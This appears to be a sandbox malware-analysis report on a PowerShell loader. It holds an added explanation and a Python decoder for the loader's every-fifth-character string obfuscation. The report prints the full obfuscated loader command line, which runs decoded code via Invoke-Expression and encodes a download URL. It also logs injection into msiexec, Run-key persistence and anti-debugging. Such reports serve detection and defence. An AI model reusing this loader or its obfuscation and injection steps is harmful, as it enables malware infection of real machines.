                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecl
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Sweetshop Forprogrammere Bevidstlse #>;$Billetkontoret='hovedngles';<#hygroscopically Borgerliggr Torpets Unclassified Blokvognens #>;$Psykes=$sulfate+$host.UI;function Boendes($Motorisere){If ($Psykes) {$Unpictorialised++;}$Aarskiftet=$genindkaldte+$Motorisere.'Length'-$Unpictorialised; for( $Herregaardene131=4;$Herregaardene131 -lt $Aarskiftet;$Herregaardene131+=5){$Pyramidia++;$Foredevote+=$Motorisere[$Herregaardene131];$Riskfulness='Oprejses';}$Foredevote;}function Aromastofs($Oversigtsbilleders173){ & ($Fandangoer) ($Oversigtsbilleders173);}$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';$Kolonialvares+=Boendes 'S ks5Bran. Pr 0Bede Topi(Fl bWK.ldiMadenbeard,uako TomwMarrsVis JerkN UdaT kov oss1Agra0T nn.besk0bio ;Feri .aphWNobbiRumln Feu6Pick4Ansv;Nord Hen xBirk6 Afs4sk d;,oss OffrKrydvDomm:Spr 1Sm g3Uud,1A ti. lmu0Calo) Si Man G askeHjercde.ak ssioUdsm/ Rot2Depo0Verb1Erot0Elec0Spar1,iks0 Kun1Jord PreFYeariRe orShreeS orfOct,oFarax Ri /Supe1Mail3Lap 1Pyxi.Sawn0Tyre ';$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';$Cafuso=Boendes 'Cho,hPytot,uttt A dp V,tsSmle:mode/ C,u/St ecLamiaSc irfraneSesue yhrGodsfHjemi KunnDecrdlivre OutrSnek. 
IderOrbio .av/Mngdv pndn Ko,/Juk T Pr rT,keaW,stuNsker,ackiRes.gDis hSpaaeBem.d PoleCalfr Bas.ProcsHeineTranaAmin ';$Luncher=Boendes 'R ck>Vi,t ';$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';$Ensnarement='Unlabialise167';$Totalisatorers='\Knighting.Pro';Aromastofs (Boendes ' Alg$E phgTinkLBadkOBrugBLayoaIndblBrne:Pr dT BatRBa keIspim N,nmSkumePrigspseutUd ao udfL,rouECu tnpas,ehals=Pala$Decie BebnLaarVCart:Rou,aChilp ampDri.DSikkaF.intAdm.AAn.i+Scud$,atat,wkwoRekttGaleAHardLBasiI Li S .tyAEquiTStosO.chorafstEVoveRSlidSOver ');Aromastofs (Boendes 'Venc$ XylgSlicLCo doVietb Pr.ADe sLPrst:UndepLordo Mi tJordASke sDynasVak.iElemFSheeEBrutRTr noSkitUAlcaS Kon=Folk$ entcTrapaSammfDy eUGuatsRovso ksp.Hu vsInseP ImplCollIRacetJ,ds(Dsl,$ Ug.l Z ru.ypeNFortc RgthN veESbeoRMed ) Soc ');Aromastofs (Boendes ' For[EmbenIsbjEtr ntrun .G nesFredEKaffRFir VLilliWaffc uefEHl np Lono l einasiNNonptKeycmExteA ByonFedeAMi rg ReiESu erkamp]Dis :Infe: ForsTrykEE,orCUnimu S irNontIKluntAtr yFejlpForor FroOAktutplotOH veC ilkOLoupLNonc Svk=Acep Lae[SturNDrage Va TT.le. Sk SMu feSlvecShr uSeleR bevI DdktTriryInwep TchrOverO ooptAizoo usCTargO,ettLLiteTNonpYArbepTyvee O,e]Tros:Tank:.enetKneblsomeS rti1dict2Well ');$Cafuso=$Potassiferous[0];$Kvatorialguineaner=(Boendes 'st.k$Vin GVrngl.toloMo,ebOv yA VoyLCoun:HestU.altn MaiE Ru vPi ta TouNBroke ouis u.gCYanaEStr,NAquaTRedrL NotYMel.=konsn ampeN tuwGuls- A.kOCivibAkkrjConfE Pa c U.dTCcdc SnkeSKekcYUrimsBalatAfdaEFlaaM Ach. osn preE Drat Sk .Wardw ExcEGangBAllecCro lfrisIInteeAnmen UndTmaan ');Aromastofs ($Kvatorialguineaner);Aromastofs (Boendes 'Fors$ RebU SpanAcineamfev MinaTeernRegieJulos onecpheneDecln ButtoverlTilsyUnh.. dsJump to behavior
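The three command lines above carry the same loader. Its string decoder, `Boendes`, keeps every fifth character of its argument starting at offset 4; the word fragments in between are filler that make each literal look like text. The loop bound is `$genindkaldte + Length - $Unpictorialised`: `$genindkaldte` is never assigned, and `$Unpictorialised` is incremented when `$Psykes` is non-null. `$Psykes` is `$sulfate + $host.UI` with `$sulfate` likewise unassigned, so it is just `$host.UI`, a live object on an ordinary PowerShell host, and the last extracted character (a trailing filler space) is dropped. `Aromastofs` hands its argument to `& ($Fandangoer)`, and `$Fandangoer` decodes to `IeX`, so every `Aromastofs (Boendes '...')` call is an Invoke-Expression of a decoded statement. The Python below is an added re-implementation written for this page, not code from the report or from Joe Sandbox. The four short literals it decodes are copied from the command line above; the `+=` fragment and the `Aromastofs` call are constructed with `encode()`, a helper that exists only here, so that accumulation and the invoke path can be exercised offline.

```python
import re

# Boendes($Motorisere): for($i=4; $i -lt $Aarskiftet; $i+=5) { $out += $Motorisere[$i] }
OFFSET = 4
STRIDE = 5


def decode(blob: str, host_ui_present: bool = True) -> str:
    """Re-implementation of the loader's Boendes function.

    $Aarskiftet = $genindkaldte + Length - $Unpictorialised. $genindkaldte is
    never assigned ($null, numerically 0). $Unpictorialised becomes 1 when
    $Psykes ($sulfate + $host.UI, i.e. $host.UI) is non-null, which it is on a
    normal host, so the bound is Length-1 and the final filler char is dropped.
    """
    end = len(blob) - (1 if host_ui_present else 0)
    return "".join(blob[i] for i in range(OFFSET, end, STRIDE))


def encode(plain: str, filler: str = "xxxx") -> str:
    """Inverse of decode(), used here only to build test input: four filler
    characters precede each payload character, and a trailing space is the
    sentinel that the host-check branch of the decoder discards."""
    assert len(filler) == OFFSET
    return "".join(filler + c for c in plain + " ")


# $name=Boendes '...'  and  $name+=Boendes '...'
ASSIGN_RE = re.compile(r"\$(\w+)\s*(\+?=)\s*Boendes\s+'([^']*)'")
# Aromastofs (Boendes '...')  ->  & ($Fandangoer) (<decoded>)  ->  IeX <decoded>
INVOKE_RE = re.compile(r"Aromastofs\s*\(\s*Boendes\s+'([^']*)'\s*\)")


def decode_assignments(script: str, host_ui_present: bool = True) -> dict:
    """Resolve every variable assigned from Boendes, honouring += concatenation."""
    values = {}
    for name, op, blob in ASSIGN_RE.findall(script):
        text = decode(blob, host_ui_present)
        values[name] = (values.get(name, "") + text) if op == "+=" else text
    return values


def decode_invocations(script: str, host_ui_present: bool = True) -> list:
    """Return the statements Aromastofs would pass to Invoke-Expression."""
    return [decode(blob, host_ui_present) for blob in INVOKE_RE.findall(script)]


# Constructed sample: the four literals on the first four lines are copied
# verbatim from the report's command line; the '+=' fragment and the
# Aromastofs statement are built with encode() and are not from the sample.
SAMPLE = (
    "$Kolonialvares=Boendes 'LaggMHjelo D lz dreiUnsilMat lTa fa F e/Forb ';"
    "$Sparebsserne=Boendes ' CoeuR mmSMatlE Br rVo,d-U,faaKon.gBrn.EForsnDolkt kva ';"
    "$Luncher=Boendes 'R ck>Vi,t ';"
    "$Fandangoer=Boendes 'HanhIunrueBoniXTemp ';"
    + "$Kolonialvares+=Boendes '" + encode("5.0") + "';"
    + "Aromastofs (Boendes '" + encode("$global:Stage2 = 1") + "');"
)

if __name__ == "__main__":
    for name, value in decode_assignments(SAMPLE).items():
        print(f"${name} = {value!r}")
    for stmt in decode_invocations(SAMPLE):
        print("IeX", repr(stmt))
```

Run against the sample, `$Kolonialvares` starts `Mozilla/` (the head of a User-Agent string), `$Sparebsserne` is `uSEr-agEnt`, `$Luncher` is `>` and `$Fandangoer` is `IeX`. Passing `host_ui_present=False` keeps the sentinel, so `IeX` becomes `IeX ` with a trailing space, which is what an analysis host that exposes a null `$host.UI` would see; the loader's decoder only lines up on a host where `$host.UI` is populated.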
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848E8CFE8 push esp; retf 2_2_00007FF848E8CFE9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FF848F57FE0 push eax; retf 2_2_00007FF848F57FE1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_09971796 pushad ; retf 5_2_09971797
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_099715BB push cs; ret 5_2_099715BE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_09971FD1 push ecx; iretd 5_2_09971FE7
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_234C1219 push esp; iretd 8_2_234C121A
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_234B2806 push ecx; ret 8_2_234B2819
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_04531FD1 push ecx; iretd 8_2_04531FE7
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_04531796 pushad ; retf 8_2_04531797
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_045315BB push cs; ret 8_2_045315BE
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00451D34 push eax; ret 14_2_00451D41
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00414060 push eax; ret 16_2_00414074
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00414060 push eax; ret 16_2_0041409C
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00414039 push ecx; ret 16_2_00414049
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_004164EB push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00416553 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00416555 push 0000006Ah; retf 16_2_004165C4
                Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run humplers
                Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run humplers
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 14_2_004047CB
                Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5486
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4391
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5852
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3984
                Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 9.0 %
                Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5996 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7164 | Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 2292 | Thread sleep count: 203 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 2292 | Thread sleep time: -101500s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836 | Thread sleep count: 3139 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836 | Thread sleep time: -9417000s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836 | Thread sleep count: 6385 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 3836 | Thread sleep time: -19155000s >= -30000s
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,FindNextFileW,FindClose,8_2_234B10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,8_2_234B6580
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040AE51 FindFirstFileW,FindNextFileW,13_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407898
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00418981 memset,GetSystemInfo,13_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
                Source: msiexec.exe, 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
                Source: powershell.exe, 00000002.00000002.2186949286.000002417A68C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2376551918.0000000006F7D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Windows\SysWOW64\msiexec.exe | API call chain: ExitProcess graph end node graph_14-34015
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00B4D6F8 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,5_2_00B4D6F8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_234B2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B4AB4 mov eax, dword ptr fs:[00000030h]8_2_234B4AB4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B724E GetProcessHeap,8_2_234B724E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_234B2B1C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_234B2639
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 8_2_234B60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_234B60E2

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
                Source: Yara match | File source: amsi64_3664.amsi.csv, type: OTHER
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4530000
